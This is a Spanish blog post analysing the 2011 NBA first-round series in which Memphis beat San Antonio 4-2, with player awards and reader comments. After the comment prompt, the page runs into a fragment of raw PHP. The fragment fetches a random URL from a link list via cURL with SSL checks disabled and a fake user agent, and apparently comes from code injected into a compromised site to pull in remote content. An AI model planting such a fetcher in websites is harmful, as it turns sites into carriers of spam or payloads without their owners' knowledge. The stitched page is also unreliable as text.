Primera ronda del Oeste: Spurs 2 – Grizzlies 4

01 de May de 2011 por txusma

No. No vamos colgarnos ninguna medalla porque no nos imaginábamos que los Grizzlies pudieran dar la campanada pero ya intuíamos, al pronosticar un 4-3, que la serie sería mucho más dura de lo que se podía pensar en un principio.

No hay excusas que valgan para San Antonio. Los Grizzlies han sido mejores en todas las facetas del juego. Por dentro, han impuesto su ley de la mano de Marc Gasol y, sobretodo, Zach Randolph. La pareja, con la importante ayuda de Darell Arthur, ha abusado de todos los jugadores interiores de los Spurs, incluyendo al hasta hace poco todopoderoso Tim Duncan. Popovic no ha encontrado la manera de parar a Randolph, pero nos hemos de preguntar, ¿alguien la hubiera encontrado? Zach ha estado sublime, perfecto en el uno contra uno. Su exhición en el último cuarto del último partido, esos minutos donde la pelota quema y nadie la quiere, debería encumbrarle y servir para discutir, mínimamente, a Kevin Durant el título de MVP de la primera ronda de estos playoffs. El ex jugador de los Knicks se ha ganado hasta el último dólar del gran contrato que firmó justo antes de empezar la post-temporada. Ahora, sólo nos queda pedirle por favor, que no se deje llevar y nos siga regalando esa actitud y ese talento que nos ha mostrado estas 2 últimas campañas.

Otro punto en que Memphis ha superado a San Antonio ha sido en la defensa, aunque parezca increíble. Los ositos han montado un entremado defensivo propio de los mismísimos Spurs y han llevado a cabo un juego intensísimo que ha acabado sacando de quicio a los tejanos: Han anotado casi 10 puntos menos que en la liga regular y lo han hecho con un 4% menos de acierto. Ni los triples les entraban. Tony Allen y Shane Battier han sido vitales en este aspecto y la participación del sustituto de Rudy Gay, Sam Young, también ha sido muy importante. De hecho nos asalta la pregunta: ¿Con Rudy Gay semejante exhibición hubiera sido posible? Creemos que sí. Gay deja atrás la mejor temporada de su carrera, en la que ha demostrado haber dado un paso hacia adelante importante, asumiendo el rol de líder e involucrando mucho más a sus compañeros. Seguro que no hubiera sido un impedimento para el juego de equipo practicado por los de Lionel Hollins.

Los Grizzlies avanzan ronda y dejan atrás a un equipo tocado y sumido en un mar de dudas. Su tiempo se acaba y lo saben pero no parece claro el camino a seguir. Supongo que aguantarán un año más, que es el que le queda de contrato a Duncan, antes de dejar paso definitivamente pero antes han de afrontar la decisión de si renovar o no a Tony Parker que acaba contrato este verano. Tienen en plantilla a jóvenes interesantes como Tiago Splitter, James Anderson o DaJuan Blair y los Spurs siempre ha sido un equipo que ha sabido extraer lo mejor de cada jugador. Claro que jugar al lado del mejor Tim Duncan ayuda. Sin él, todo será más oscuro en San Antonio.

PREMIOS

MVP: Zach Randolph ha dominado la serie de principio a fin. Su triple en el cuarto partido, sus 17 puntos en el último cuarto del sexto y sus 21’5 puntos y 9’2 rebotes de media en esta serie le otorgan el título sin duda alguna.

Sorpresa: El nivel de Zach Randolph, la defensa de Allen y Battier, el dominio de Gasol, la irrupción de Young y Vazquez, el buen papel desde el banco de Mayo y Arthur, el mando de Conley… Los ositos nos han dejado a todos con la boca abierta.

Decepción: A Richard Jefferson se le fichó hace 2 años para que diera lo mejor de sí en Playoffs y el resultado no ha podido ser más desastroso. 6’5 puntos y 4’2 rebotes son unos números muy pobres. En el sexto y definitivo partido sólo jugó 10 minutos y no por problemas de faltas precisamente.

Esfuerzo en vano: Lo llevaba haciendo toda la temporada pero en Playoffs se ha acabado de ver claro. Manu Ginobili ha sido el líder de los Spurs y lo ha hecho siendo fiel a su estilo. Canastas decisivas, coraje a raudales, un poco de épica… 20’6 puntos, 4 rebotes y 4’2 asistencias que se van al limbo.

Comenta

4 comentarios a esta entrada

  1. olarte dice:
    #1

    una cosa, yo soy un fan de OJ Mayo pero esta temporada no le he seguido mucho…porque ha hecho una temporada tan mala y ya no es ni titular?Si es un jugadorazo

      Citar

  2. Denise dice:
    #2

    Poco que decir, coincido 100% con el analisis.
    Lo de Mayo será cuestión de actitud y cabeza. Siguiendo los pasos de Gilbert Arenas tanto arrastrandose en la cancha como fuera “jugando” con las pistolitas (con Tony Allen). Y si a ellos le sumas el positivo que dio por DHEA, pues normal que no se confie mucho en él. Como decía Pirelli, la potencia sin control no sirve de nada.

      Citar

  3. HisRoyalAirness dice:
    #3

    Gran análisis Txus! De acuerdo al 100×100.

    Y hoy han seguido igual los ositos, con un dominio bajo aros magistral y una defensa de perímetro y un hambre propias de campeones. Sin palabras

      Citar

  4. Tobal dice:
    #4

    Enhorabuena a los Grizzlies,han dado una lección de baloncesto a los Spurs,tanto en defensa como en ataque,tienen mucho mérito y espero que lleguen muy lejos,en estas eliminatorias.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>